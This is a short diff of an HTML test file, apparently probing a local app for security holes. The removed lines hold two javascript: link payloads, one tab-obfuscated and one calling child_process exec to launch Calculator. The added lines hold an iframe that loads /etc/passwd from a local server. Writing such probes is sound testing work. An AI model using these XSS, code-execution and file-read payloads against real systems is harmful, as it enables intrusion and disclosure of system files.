--- a/test_rc.html
+++ b/test_rc.html
@@ -1,5 +1,6 @@
-
-
-<a href="java&Tab;script:alert(JSON.stringify(Object.keys(window)))">Click Me</a>
-
-<a href="javascript:require('child_process').exec('open -a Calculator')">Click me</a>
+<iframe 
+  src="http://localhost:4000/etc/passwd" 
+  width="100%" 
+  height="600px" 
+  style="border:1px solid black;">
+</iframe>
